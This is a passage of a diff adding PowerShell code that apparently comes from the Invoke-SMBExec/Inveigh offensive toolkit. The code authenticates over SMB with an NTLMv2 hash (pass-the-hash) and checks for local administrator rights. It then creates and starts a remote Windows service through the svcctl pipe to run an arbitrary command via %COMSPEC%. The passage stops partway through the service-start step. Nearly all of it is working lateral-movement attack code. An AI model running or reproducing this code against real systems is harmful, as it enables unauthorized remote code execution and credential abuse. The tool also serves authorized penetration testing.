+ $security_blob_bytes = 0x01,0x01,0x00,0x00,
+ 0x00,0x00,0x00,0x00 +
+ $SMB_target_time_bytes +
+ $client_challenge_bytes +
+ 0x00,0x00,0x00,0x00 +
+ $SMB_target_details +
+ 0x00,0x00,0x00,0x00,
+ 0x00,0x00,0x00,0x00
+
+ $server_challenge_and_security_blob_bytes = $SMB_NTLM_challenge + $security_blob_bytes
+ $HMAC_MD5.key = $NTLMv2_hash
+ $NTLMv2_response = $HMAC_MD5.ComputeHash($server_challenge_and_security_blob_bytes)
+
+ if($SMB_signing)
+ {
+ $session_base_key = $HMAC_MD5.ComputeHash($NTLMv2_response)
+ $session_key = $session_base_key
+ $HMAC_SHA256 = New-Object System.Security.Cryptography.HMACSHA256
+ $HMAC_SHA256.key = $session_key
+ }
+
+ $NTLMv2_response = $NTLMv2_response + $security_blob_bytes
+ $NTLMv2_response_length = [System.BitConverter]::GetBytes($NTLMv2_response.Length)
+ $NTLMv2_response_length = $NTLMv2_response_length[0,1]
+ $SMB_session_key_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + $NTLMv2_response.Length + 88)
+
+ $NTLMSSP_response = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,
+ 0x03,0x00,0x00,0x00,
+ 0x18,0x00,
+ 0x18,0x00 +
+ $auth_LM_offset +
+ $NTLMv2_response_length +
+ $NTLMv2_response_length +
+ $auth_NTLM_offset +
+ $auth_domain_length +
+ $auth_domain_length +
+ $auth_domain_offset +
+ $auth_username_length +
+ $auth_username_length +
+ $auth_username_offset +
+ $auth_hostname_length +
+ $auth_hostname_length +
+ $auth_hostname_offset +
+ $SMB_session_key_length +
+ $SMB_session_key_length +
+ $SMB_session_key_offset +
+ $SMB_negotiate_flags +
+ $auth_domain_bytes +
+ $auth_username_bytes +
+ $auth_hostname_bytes +
+ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 +
+ $NTLMv2_response
+
+ if($SMB_version -eq 'SMB1')
+ {
+ $SMB_user_ID = $SMB_client_receive[32,33]
+ $packet_SMB_header = New-PacketSMBHeader 0x73 0x18 0x07,0xc8 0xff,0xff $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ }
+
+ $packet_SMB_header["UserID"] = $SMB_user_ID
+ $packet_NTLMSSP_negotiate = New-PacketNTLMSSPAuth $NTLMSSP_response
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate
+ $packet_SMB_data = New-PacketSMBSessionSetupAndXRequest $NTLMSSP_negotiate
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ }
+ else
+ {
+ $SMB2_message_ID += 1
+ $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_NTLMSSP_auth = New-PacketNTLMSSPAuth $NTLMSSP_response
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth
+ $packet_SMB2_data = New-PacketSMB2SessionSetupRequest $NTLMSSP_auth
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ }
+
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($SMB_version -eq 'SMB1')
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[9..12]) -eq '00-00-00-00')
+ {
+ Write-Verbose "$output_username successfully authenticated on $Target"
+ $login_successful = $true
+ }
+ else
+ {
+ Write-Output "$output_username failed to authenticate on $Target"
+ $login_successful = $false
+ }
+
+ }
+ else
+ {
+ if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -eq '00-00-00-00')
+ {
+ Write-Verbose "$output_username successfully authenticated on $Target"
+ $login_successful = $true
+ }
+ else
+ {
+ Write-Output "$output_username failed to authenticate on $Target"
+ $login_successful = $false
+ }
+
+ }
+
+ }
+
+ }
+
+ if($login_successful -or $session_string)
+ {
+
+ if($session_string)
+ {
+
+ if($session_string -and $inveigh.session_lock_table[$session] -eq 'locked')
+ {
+ Write-Output "[*] Pausing due to Inveigh Relay session lock"
+ Start-Sleep -s 2
+ }
+
+ $inveigh.session_lock_table[$session] = 'locked'
+ $SMB_client = $inveigh.session_socket_table[$session]
+ $SMB_client_stream = $SMB_client.GetStream()
+ $SMB_session_ID = $inveigh.session_table[$session]
+ $SMB2_message_ID = $inveigh.session_message_ID_table[$session]
+ $SMB2_tree_ID = 0x00,0x00,0x00,0x00
+ }
+
+ $SMB_path = "\\" + $Target + "\IPC$"
+
+ if($SMB_version -eq 'SMB1')
+ {
+ $SMB_path_bytes = [System.Text.Encoding]::UTF8.GetBytes($SMB_path) + 0x00
+ }
+ else
+ {
+ $SMB_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_path)
+ }
+
+ $SMB_named_pipe_UUID = 0x81,0xbb,0x7a,0x36,0x44,0x98,0xf1,0x35,0xad,0x32,0x98,0xf0,0x38,0x00,0x10,0x03
+
+ if(!$Service)
+ {
+ $SMB_service_random = [String]::Join("00-",(1..20 | ForEach-Object{"{0:X2}-" -f (Get-Random -Minimum 65 -Maximum 90)}))
+ $SMB_service = $SMB_service_random -replace "-00",""
+ $SMB_service = $SMB_service.Substring(0,$SMB_service.Length - 1)
+ $SMB_service = $SMB_service.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $SMB_service = New-Object System.String ($SMB_service,0,$SMB_service.Length)
+ $SMB_service_random += '00-00-00-00-00'
+ $SMB_service_bytes = $SMB_service_random.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ }
+ else
+ {
+ $SMB_service = $Service
+ $SMB_service_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_service)
+
+ if([Bool]($SMB_service.Length % 2))
+ {
+ $SMB_service_bytes += 0x00,0x00
+ }
+ else
+ {
+ $SMB_service_bytes += 0x00,0x00,0x00,0x00
+
+ }
+
+ }
+
+ $SMB_service_length = [System.BitConverter]::GetBytes($SMB_service.Length + 1)
+
+ if($CommandCOMSPEC -eq 'Y')
+ {
+ $Command = "%COMSPEC% /C `"" + $Command + "`""
+ }
+ else
+ {
+ $Command = "`"" + $Command + "`""
+ }
+
+ [System.Text.Encoding]::UTF8.GetBytes($Command) | ForEach-Object{$SMBExec_command += "{0:X2}-00-" -f $_}
+
+ if([Bool]($Command.Length % 2))
+ {
+ $SMBExec_command += '00-00'
+ }
+ else
+ {
+ $SMBExec_command += '00-00-00-00'
+ }
+
+ $SMBExec_command_bytes = $SMBExec_command.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $SMBExec_command_length_bytes = [System.BitConverter]::GetBytes($SMBExec_command_bytes.Length / 2)
+ $SMB_split_index = 4256
+
+ if($SMB_version -eq 'SMB1')
+ {
+ $SMB_client_stage = 'TreeConnectAndXRequest'
+
+ :SMB_execute_loop while ($SMB_client_stage -ne 'exit')
+ {
+
+ switch ($SMB_client_stage)
+ {
+
+ 'TreeConnectAndXRequest'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x75 0x18 0x01,0x48 0xff,0xff $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $MD5 = New-Object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBTreeConnectAndXRequest $SMB_path_bytes
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'CreateAndXRequest'
+ }
+
+ 'CreateAndXRequest'
+ {
+ $SMB_named_pipe_bytes = 0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00 # \svcctl
+ $SMB_tree_ID = $SMB_client_receive[28,29]
+ $packet_SMB_header = New-PacketSMBHeader 0xa2 0x18 0x02,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBNTCreateAndXRequest $SMB_named_pipe_bytes
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'RPCBind'
+ }
+
+ 'RPCBind'
+ {
+ $SMB_FID = $SMB_client_receive[42,43]
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_RPC_data = New-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data + $RPC_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'OpenSCManagerW'
+ }
+
+ 'ReadAndXRequest'
+ {
+ Start-Sleep -m $Sleep
+ $packet_SMB_header = New-PacketSMBHeader 0x2e 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBReadAndXRequest $SMB_FID
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = $SMB_client_stage_next
+ }
+
+ 'OpenSCManagerW'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $packet_SCM_data = New-PacketSCMOpenSCManagerW $SMB_service_bytes $SMB_service_length
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0f,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'CheckAccess'
+ }
+
+ 'CheckAccess'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '00-00-00-00' -and [System.BitConverter]::ToString($SMB_client_receive[88..107]) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00')
+ {
+ $SMB_service_manager_context_handle = $SMB_client_receive[88..107]
+
+ if($SMB_execute)
+ {
+ Write-Verbose "$output_username is a local administrator on $Target"
+ $packet_SCM_data = New-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $SMBExec_command_bytes $SMBExec_command_length_bytes
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+
+ if($SCM_data.Length -lt $SMB_split_index)
+ {
+ $SMB_client_stage = 'CreateServiceW'
+ }
+ else
+ {
+ $SMB_client_stage = 'CreateServiceW_First'
+ }
+
+ }
+ else
+ {
+ Write-Output "$output_username is a local administrator on $Target"
+ $SMB_close_service_handle_stage = 2
+ $SMB_client_stage = 'CloseServiceHandle'
+ }
+
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '05-00-00-00')
+ {
+ Write-Output "$output_username is not a local administrator or does not have required privilege on $Target"
+ $SMBExec_failed = $true
+ }
+ else
+ {
+ Write-Output "Something went wrong with $Target"
+ $SMBExec_failed = $true
+ }
+
+ }
+
+ 'CreateServiceW'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $packet_SCM_data = New-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $SMBExec_command_bytes $SMBExec_command_length_bytes
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+
+ $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'StartServiceW'
+ }
+
+ 'CreateServiceW_First'
+ {
+ $SMB_split_stage_final = [Math]::Ceiling($SCM_data.Length / $SMB_split_index)
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $SCM_data_first = $SCM_data[0..($SMB_split_index - 1)]
+ $packet_RPC_data = New-PacketRPCRequest 0x01 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_first
+ $packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length)
+ $SMB_split_index_tracker = $SMB_split_index
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data + $RPC_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($SMB_split_stage_final -le 2)
+ {
+ $SMB_client_stage = 'CreateServiceW_Last'
+ }
+ else
+ {
+ $SMB_split_stage = 2
+ $SMB_client_stage = 'CreateServiceW_Middle'
+ }
+
+ }
+
+ 'CreateServiceW_Middle'
+ {
+ $SMB_split_stage++
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $SCM_data_middle = $SCM_data[$SMB_split_index_tracker..($SMB_split_index_tracker + $SMB_split_index - 1)]
+ $SMB_split_index_tracker += $SMB_split_index
+ $packet_RPC_data = New-PacketRPCRequest 0x00 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_middle
+ $packet_RPC_data["AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length - $SMB_split_index_tracker + $SMB_split_index)
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data + $RPC_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($SMB_split_stage -ge $SMB_split_stage_final)
+ {
+ $SMB_client_stage = 'CreateServiceW_Last'
+ }
+ else
+ {
+ $SMB_client_stage = 'CreateServiceW_Middle'
+ }
+
+ }
+
+ 'CreateServiceW_Last'
+ {
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x48 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $SCM_data_last = $SCM_data[$SMB_split_index_tracker..$SCM_data.Length]
+ $packet_RPC_data = New-PacketRPCRequest 0x02 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_last
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB_sign = $session_key + $SMB_header + $SMB_data + $RPC_data
+ $SMB_signature = $MD5.ComputeHash($SMB_sign)
+ $SMB_signature = $SMB_signature[0..7]
+ $packet_SMB_header["Signature"] = $SMB_signature
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'StartServiceW'
+ }
+
+ 'StartServiceW'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[112..115]) -eq '00-00-00-00')
+ {
+ Write-Verbose "Service $SMB_service created on $Target"
+ $SMB_service_context_handle = $SMB_client_receive[92..111]
+ $packet_SMB_header = New-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID
+
+ if($SMB_signing)
+ {
+ $packet_SMB_header["Flags2"] = 0x05,0x48
+ $SMB_signing_counter = $SMB_signing_counter + 2
+ [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00
+ $packet_SMB_header["Signature"] = $SMB_signing_sequence
+ }
+
+ $packet_SCM_data = New-PacketSCMStartServiceW $SMB_service_context_handle
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x03,0x00,0x00,0x00 0x00,0x00 0x13,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = New-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length)
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+
+ $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
